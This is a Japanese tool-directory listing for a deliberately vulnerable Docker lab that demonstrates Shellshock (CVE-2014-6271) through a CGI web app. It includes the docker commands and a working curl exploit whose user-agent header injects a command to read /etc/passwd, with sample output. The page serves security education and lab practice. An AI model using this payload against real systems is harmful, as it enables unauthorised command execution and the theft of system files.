Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
vaas-cve-2014-6271 — 脆弱性 as a service: CVS-2014-6271, a.k.a. Shellshock の紹介 | Kitploit
ツール/GitHubGitHub/hmlio/vaas-cve-2014-6271
コンテナセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubhmlio/vaas-cve-2014-6271

vaas-cve-2014-6271

脆弱性 as a service: CVS-2014-6271, a.k.a. Shellshock の紹介

リポジトリを見る
22716年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

脆弱性 as a Service - CVE 2014-6271

脆弱なバージョンのbashを搭載したDebian (Buster) Linuxシステムと、CVS-2014-6271(別名Shellshock)を実演するWebアプリケーションです。

概要

このDockerコンテナはDebian Busterをベースにしており、脆弱なバージョンのBash(bash_4.2:2b:dfsg-0.1)を使用するように変更されています。

Apache 2を介してWebアプリケーションが利用可能で、シェルコマンドを実行するCGIスクリプトを提供します。

使用方法

コンテナをインストールするには、docker pull hmlio/vaas-cve-2014-6271 を実行します。

ポートマッピングを指定してコンテナを実行するには、docker run -d -p 8080:80 hmlio/vaas-cve-2014-6271 を実行します。

http://your-ip:8080/ でWebアプリケーションにアクセスできるはずです。

攻撃手法

以下のように、Webアプリケーション/脆弱なbashバージョンを悪用できます。

root@kitploit:~
# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://your-ip:8080/cgi-bin/stats

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh

クレジット

このコンセプトとWebアプリケーションは、rasta_mouseが作成したVulnHub VM「Sokar」に大きく影響を受けています。

詳細については、https://www.vulnhub.com/entry/sokar-1,113/ をご覧ください。

ツールをダウンロード